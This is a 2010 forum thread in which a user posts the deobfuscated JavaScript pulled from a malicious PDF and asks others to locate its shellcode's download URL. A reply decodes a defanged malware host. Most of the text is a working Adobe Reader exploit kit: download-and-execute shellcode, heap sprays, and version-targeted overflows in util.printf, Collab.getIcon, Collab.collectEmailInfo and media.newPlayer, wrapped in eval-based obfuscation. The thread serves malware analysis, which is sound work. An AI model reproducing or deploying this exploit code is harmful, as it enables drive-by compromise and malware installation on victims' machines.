Author Topic: Wepawet failed to Decode !  (Read 3278 times)

0 Members and 1 Guest are viewing this topic.

September 29, 2010, 02:02:33 pm
Read 3278 times

MADY

  • Newbie

  • Offline
  • *

  • 7
I received a malicious pdf, I tried both the automated system "wepawet" &  "jsunpack". Finally I used "malwaretracker.com" to know about the streams which are available in the Pdf file.

Quote

 
function yeqiupve(btiegea)
 
 {
   
   var uaueeuio = '';
   
   var efyliefq = '';
   
   for(tfaeopiul=0;
   tfaeopiul<btiegea.length;
   tfaeopiul++)
   
   {
     
     var aeeoeyu = btiegea.charAt(tfaeopiul);
     
     if(aeeoeyu == uaueeuio)
     {
       
     }
     else
     {
       efyliefq+=aeeoeyu;
       
     }
     
   }
   
   return efyliefq;
   
 }
 
 
 var uxivqia = yeqiupve("\r\n\r\nfunction shcode(url)\r\n
 {
   \r\n\r\nsh = \"%u9090%u9090%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455\";
   \r\nreturn sh+url;
   \r\n
 }
 \r\n\r\nfunction nplayer()
 {
   \r\nfunction kbve()\r\n
   {
     \r\nvar eobe=\"p@111111111111111111111111 : yyyy111\";
     \r\nutil.printd(eobe, ne Date());
     \r\n
   }
   \r\n\r\nvar grix=12000;
   \r\njucobu=ne Array();
   \r\nvar klkng = \"%u9090%u9090\";
   \r\nvar hjnalb8=shcode(\"%u7468%u7074%u2F3A%u632F%u6276%u6474%u632E%u2E6F%u6363%u762F%u6664%u2F67%u7865%u2E65%u6870%u3F70%u7865%u3D70%u4450%u2046%u6E28%u7765%u6C50%u7961%u7265%u2629%u656B%u3D79%u3438%u3464%u3333%u3933%u6230%u3263%u3632%u3265%u3861%u3836%u3434%u3237%u6264%u3139%u3864%u3239\");
   \r\nklkng=unescape(klkng);
   \r\nhjnalb8=unescape(hjnalb8);
   \r\n\r\nhile(klkng.length <= 0x8000)
   {
     klkng+=klkng;
   }
   \r\nklkng=klkng.substr(0,0x8000 - hjnalb8.length);
   \r\nfor(ffam=0;
   ffam<grix;
   ffam++)
   {
     jucobu[ffam]=klkng + hjnalb8;
   }
   \r\nif(grix)
   {
     kbve();
     kbve();
     try
     {
       this.media.nePlayer(null);
     }
     catch(e)
     {
       
     }
     kbve();
   }
   \r\n
 }
 \r\n\r\nfunction printf()
 {
   \r\n\r\nvar payload=unescape(shcode(\"%u7468%u7074%u2F3A%u632F%u6276%u6474%u632E%u2E6F%u6363%u762F%u6664%u2F67%u7865%u2E65%u6870%u3F70%u7865%u3D70%u4450%u2046%u7028%u6972%u746E%u2966%u6B26%u7965%u383D%u6434%u3334%u3333%u3039%u6362%u3232%u6536%u6132%u3638%u3438%u3734%u6432%u3962%u6431%u3938%u0032\"));
   \r\n\r\nvar nop =\"\";
   \r\nfor (iCnt=128;
   iCnt>=0;
   --iCnt) nop += unescape(\"%u9090%u9090%u9090%u9090%u9090\");
   \r\nheapblock = nop + payload;
   \r\nbigblock = unescape(\"%u9090%u9090\");
   \r\nheadersie = 20;
   \r\nspray = headersie+heapblock.length;
   \r\nhile (bigblock.length<spray) bigblock+=bigblock;
   \r\nfillblock = bigblock.substring(0, spray);
   \r\nblock = bigblock.substring(0, bigblock.length-spray);
   \r\nhile(block.length+spray < 0x40000) block = block+block+fillblock;
   \r\nmem = ne Array();
   \r\nfor (i=0;
   i<1400;
   i++) mem = block + heapblock;
   \r\n\r\nvar num = 12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888\r\nutil.printf(\"%45000f\",num);
   \r\n
 }
 \r\n\r\nfunction geticon()
 {
   \r\n\r\nvar shellcode=unescape(shcode(\"%u7468%u7074%u2F3A%u632F%u6276%u6474%u632E%u2E6F%u6363%u762F%u6664%u2F67%u7865%u2E65%u6870%u3F70%u7865%u3D70%u4450%u2046%u4728%u7465%u6349%u6E6F%u2629%u656B%u3D79%u3438%u3464%u3333%u3933%u6230%u3263%u3632%u3265%u3861%u3836%u3434%u3237%u6264%u3139%u3864%u3239\"));
   \r\n\r\ngarbage = unescape(\"%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090\") + shellcode;
   \r\nnopblock = unescape(\"%u9090%u9090\");
   \r\nheadersie = 10;
   \r\nacl = headersie+garbage.length;
   \r\n\r\nhile (nopblock.length<acl) nopblock+=nopblock;
   \r\nfillblock = nopblock.substring(0, acl);
   \r\nblock = nopblock.substring(0, nopblock.length-acl);
   \r\nhile(block.length+acl<0x40000) block = block+block+fillblock;
   \r\nmemory = ne Array();
   \r\nfor (i=0;
   i<180;
   i++) memory = block + garbage;
   \r\nvar buffersie = 4012;
   \r\nvar buffer = Array(buffersie);
   \r\nfor (i=0;
   i<buffersie;
   i++)\r\n
   {
     \r\nbuffer = unescape(\"%0a%0a%0a%0a\");
     \r\n
   }
   \r\n\r\nCollab.getIcon(buffer+\"_N.bundle\");
   \r\n
 }
 \r\n\r\nfunction collab()
 {
   \r\n\r\nfunction fix_it(yarsp,len)
   {
     \r\nhile(yarsp.length*2<len)
     {
       yarsp+=yarsp;
       
     }
     \r\nyarsp=yarsp.substring(0,len/2);
     \r\nreturn yarsp;
     
   }
   \r\nvar shellcode=unescape(shcode(\"%u7468%u7074%u2F3A%u632F%u6276%u6474%u632E%u2E6F%u6363%u762F%u6664%u2F67%u7865%u2E65%u6870%u3F70%u7865%u3D70%u4450%u2046%u4328%u6C6F%u616C%u2962%u6B26%u7965%u383D%u6434%u3334%u3333%u3039%u6362%u3232%u6536%u6132%u3638%u3438%u3734%u6432%u3962%u6431%u3938%u0032\"));
   \r\nvar mem_array=ne Array();
   \r\nvar cc=0x0c0c0c0c;
   \r\nvar addr=0x400000;
   \r\nvar sc_len=shellcode.length*2;
   \r\nvar len=addr-(sc_len+0x38);
   \r\nvar yarsp=unescape(\"%u9090%u9090\");
   \r\nyarsp=fix_it(yarsp,len);
   \r\nvar count2=(cc-0x400000)/addr;
   \r\nfor(var count=0;
   count<count2;
   count++)
   {
     mem_array[count]=yarsp+shellcode;
     
   }
   \r\nvar overflo=unescape(\"%u0c0c%u0c0c\");
   \r\nhile(overflo.length<44952)
   {
     overflo+=overflo;
     
   }
   \r\nthis.collabStore=Collab.collectEmailInfo(
   {
     subj:\"\",msg:overflo
   }
   );
   \r\n\r\n
 }
 \r\n\r\naPlugins = app.plugIns;
 \r\nvar sv=parseInt(app.vieerVersion.toString().charAt(0));
 \r\nfor (var i=0;
 i < aPlugins.length;
 i++)\r\n
 {
   \r\n    if (aPlugins.name==\"EScript\")\r\n
   {
     \r\n        var lv=aPlugins.version;
     \r\n
   }
   \r\n
 }
 \r\nif ((lv==9)||((sv==8)&&(lv<=8.12)))\r\n
 {
   \r\n    geticon();
   \r\n
 }
 \r\nelse if (lv==7.1)\r\n
 {
   \r\n    printf();
   \r\n
 }
 \r\nelse if (((sv==6)||(sv==7))&&(lv<7.11))\r\n
 {
   \r\n    collab();
   \r\n
 }
 \r\nelse if ((lv >= 9.1) || (lv <= 9.2) || (lv >= 8.13) || (lv <= 8.17))\r\n
 {
   \r\n        nplayer();
   \r\n
 }
 \r\n\r\n");
 
 
 
 loeiize = ''+uxivqia+'';
 
 
 
 var kyvxga = 500;
 
 var egoioany = '';
 
 aruibdoxy0 = loeiize;
 
 for(mauojbqob=0;
 mauojbqob<kyvxga;
 mauojbqob++)
 
 {
   
   var ghsd = mauojbqob+1;
   
   egoioany+='var aruibdoxy'+ghsd+' = aruibdoxy'+mauojbqob+';
   ';
   
   this['ev'+'al'](egoioany);
   
 }
 
 
 
 this['eva'+'l']('this[\'eva\'+\'l\'](aruibdoxy'+kyvxga+');
 ');
 

I believe the shellcode would be

Quote

%u9090%u9090%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455\


 "Heap Spray" concept is used here and i am not sure about the URL of the shellcode. Please help me to find out URL!

Thanks
MAD




 

September 29, 2010, 02:51:08 pm
Reply #1

GmG

  • Special Members
  • Full Member

  • Offline
  • *

  • 92
Code: [Select]
hjnalb8=shcode(\"%u7468%u7074%u2F3A%u632F%u6276%u6474%u632E%u2E6F%u6363%u762F%u6664%u2F67%u7865%u2E65%u6870%u3F70%u7865%u3D70%u4450%u2046%u6E28%u7765%u6C50%u7961%u7265%u2629%u656B%u3D79%u3438%u3464%u3333%u3933%u6230%u3263%u3632%u3265%u3861%u3836%u3434%u3237%u6264%u3139%u3864%u3239\");


Code: [Select]
hxxp://cvbtd.co.cc/vdfg/exe.php?exp=PDF (newPlayer)&key=84d433390bc226e2a8684472db91d892